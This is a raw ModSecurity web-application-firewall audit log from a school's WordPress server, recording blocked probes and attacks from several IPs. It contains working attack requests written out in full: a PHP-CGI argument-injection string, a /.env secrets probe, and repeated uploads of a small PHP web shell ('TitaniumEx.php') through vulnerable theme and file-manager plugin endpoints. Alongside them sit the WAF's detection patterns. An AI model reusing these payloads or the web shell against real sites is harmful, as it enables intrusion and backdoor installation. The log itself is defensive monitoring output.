"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747585963219322 5161 (- - -) Stopwatch2: 1747585963219322 5161; combined=3729, p1=474, p2=3057, p3=28, p4=31, p5=82, sr=63, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6a73e13-Z-- --dc964870-A-- [18/May/2025:23:33:36 +0700] aCoL4EPRqak7bVuUS6e50AAAAJc 103.236.140.4 54808 103.236.140.4 8181 --dc964870-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 168.228.164.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 168.228.164.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dc964870-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc964870-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747586016549172 2617 (- - -) Stopwatch2: 1747586016549172 2617; combined=1460, p1=448, p2=980, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc964870-Z-- --1a1d5c29-A-- [18/May/2025:23:35:55 +0700] aCoMa_ypzAd0elWOk7rbMgAAAA8 103.236.140.4 56814 103.236.140.4 8181 --1a1d5c29-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 96.9.86.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 96.9.86.107 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1a1d5c29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a1d5c29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747586155964561 2123 (- - -) Stopwatch2: 1747586155964561 2123; combined=1094, p1=349, p2=713, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a1d5c29-Z-- --5f52b756-A-- [18/May/2025:23:42:57 +0700] aCoOEUPRqak7bVuUS6e8RwAAAIw 103.236.140.4 35656 103.236.140.4 8181 --5f52b756-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f52b756-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f52b756-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747586577784101 2290 (- - -) Stopwatch2: 1747586577784101 2290; combined=1010, p1=358, p2=629, p3=0, p4=0, p5=23, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f52b756-Z-- --44e96535-A-- [18/May/2025:23:43:05 +0700] aCoOGfypzAd0elWOk7rdCQAAAAw 103.236.140.4 35752 103.236.140.4 8181 --44e96535-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --44e96535-C-- demo.sayHello --44e96535-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --44e96535-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747586585409167 5553 (- - -) Stopwatch2: 1747586585409167 5553; combined=4487, p1=556, p2=3667, p3=35, p4=63, p5=98, sr=74, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44e96535-Z-- --6236bd4a-A-- [19/May/2025:00:10:13 +0700] aCoUdUPRqak7bVuUS6fEYwAAAII 103.236.140.4 37200 103.236.140.4 8181 --6236bd4a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 68.183.86.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 68.183.86.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6236bd4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6236bd4a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747588213329161 3521 (- - -) Stopwatch2: 1747588213329161 3521; combined=1514, p1=526, p2=956, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6236bd4a-Z-- --c7707944-A-- [19/May/2025:00:11:59 +0700] aCoU30PRqak7bVuUS6fEZQAAAI8 103.236.140.4 37208 103.236.140.4 8181 --c7707944-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --c7707944-C-- --c7707944-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7707944-E-- --c7707944-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747588319306375 3856 (- - -) Stopwatch2: 1747588319306375 3856; combined=2308, p1=453, p2=1824, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7707944-Z-- --1de20864-A-- [19/May/2025:00:25:34 +0700] aCoYDkPRqak7bVuUS6fEgQAAAJU 103.236.140.4 37298 103.236.140.4 8181 --1de20864-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 212.105.78.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 212.105.78.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1de20864-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1de20864-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747589134399596 3493 (- - -) Stopwatch2: 1747589134399596 3493; combined=1468, p1=486, p2=951, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1de20864-Z-- --ad185722-A-- [19/May/2025:00:50:50 +0700] aCod-hir-GlPrFVVKe7YnwAAAFc 103.236.140.4 37436 103.236.140.4 8181 --ad185722-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 191.241.254.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 191.241.254.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ad185722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad185722-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747590650931491 3314 (- - -) Stopwatch2: 1747590650931491 3314; combined=1441, p1=501, p2=909, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad185722-Z-- --f9150a67-A-- [19/May/2025:01:01:45 +0700] aCogiUPRqak7bVuUS6fEqAAAAJU 103.236.140.4 38108 103.236.140.4 8181 --f9150a67-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 143.244.168.161 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 143.244.168.161 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f9150a67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9150a67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747591305196956 787 (- - -) Stopwatch2: 1747591305196956 787; combined=354, p1=306, p2=0, p3=0, p4=0, p5=48, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9150a67-Z-- --7a7f681a-A-- [19/May/2025:01:11:59 +0700] aCoi7xir-GlPrFVVKe7Y2AAAAEk 103.236.140.4 38308 103.236.140.4 8181 --7a7f681a-B-- POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 625 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --7a7f681a-C-- Filedata=TitaniumEx.php&Filedata=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --7a7f681a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a7f681a-E-- --7a7f681a-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:Filedata. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||smkn22-jkt.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:Filedata: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF"] [t Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747591919347062 1813 (- - -) Stopwatch2: 1747591919347062 1813; combined=747, p1=410, p2=310, p3=0, p4=0, p5=27, sr=98, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a7f681a-Z-- --d98e0e6e-A-- [19/May/2025:01:12:07 +0700] aCoi91ewLfDrCkDGIGz0rgAAAMc 103.236.140.4 38352 103.236.140.4 8181 --d98e0e6e-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 733 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: multipart/form-data; boundary=6a54ae8c6d6da1882e5560e3f1025b2e --d98e0e6e-C-- --6a54ae8c6d6da1882e5560e3f1025b2e Content-Disposition: form-data; name="cmd" upload --6a54ae8c6d6da1882e5560e3f1025b2e Content-Disposition: form-data; name="target" l1_Lw --6a54ae8c6d6da1882e5560e3f1025b2e Content-Disposition: form-data; name="upload[]"; filename="TitaniumEx.php" Content-Type: multipart/form-data

Telegram : @BIBIL_0DAY

'.php_uname()." ".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}} } ?> --6a54ae8c6d6da1882e5560e3f1025b2e-- --d98e0e6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d98e0e6e-E-- --d98e0e6e-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747591927047950 3308 (- - -) Stopwatch2: 1747591927047950 3308; combined=2127, p1=415, p2=1681, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d98e0e6e-Z-- --6a359263-A-- [19/May/2025:01:14:15 +0700] aCojdxir-GlPrFVVKe7ZjQAAAFA 103.236.140.4 39102 103.236.140.4 8181 --6a359263-B-- GET /wp-content/uploads/mfw-activity-logger/csv-uploads/TitaniumEx.php?Titanium=Ex HTTP/1.0 Referer: www.google.com Host: www.smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 611 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --6a359263-C-- =TitaniumExV1.php&=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --6a359263-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a359263-E-- --6a359263-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||www.smkn22-jkt.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic" Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747592055079840 1962 (- - -) Stopwatch2: 1747592055079840 1962; combined=790, p1=462, p2=299, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a359263-Z-- --5cd8d867-A-- [19/May/2025:01:14:30 +0700] aCojhvypzAd0elWOk7rlVgAAAAA 103.236.140.4 39344 103.236.140.4 8181 --5cd8d867-B-- POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.0 Referer: www.google.com Host: www.smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 625 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --5cd8d867-C-- 
Filedata=TitaniumEx.php&Filedata=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --5cd8d867-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cd8d867-E-- --5cd8d867-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:Filedata. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||www.smkn22-jkt.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:Filedata: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
